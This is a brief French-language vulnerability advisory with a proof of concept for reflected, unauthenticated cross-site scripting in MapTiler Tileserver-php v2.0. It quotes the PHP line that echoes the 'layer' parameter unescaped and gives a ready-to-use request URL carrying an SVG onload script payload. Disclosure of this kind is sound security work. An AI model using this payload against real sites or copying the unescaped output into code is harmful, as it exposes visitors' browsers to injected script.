
Exploit de preuve de concept pour XSS réfléchie non authentifiée dans MapTiler Tileserver-php v2.0 via le paramètre GET 'layer', permettant l'exécution arbitraire de HTML/JS.
XSS non authentifié dans MapTiler Tileserver-php v2.0.
MapTiler Tileserver-php v2.0 est vulnérable aux Cross Site Scripting (XSS). Le paramètre GET « layer » est reflété dans un message d'erreur sans encodage HTML. Cela conduit à une XSS et permet à un attaquant non authentifié d'exécuter du code HTML ou JavaScript arbitraire dans le navigateur d'une victime.
echo 'Server: Unknown or not specified dataset "' . $tileset . '"';
http://host/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3csvg+onload=alert(document.domain)%3e
Martin Herancourt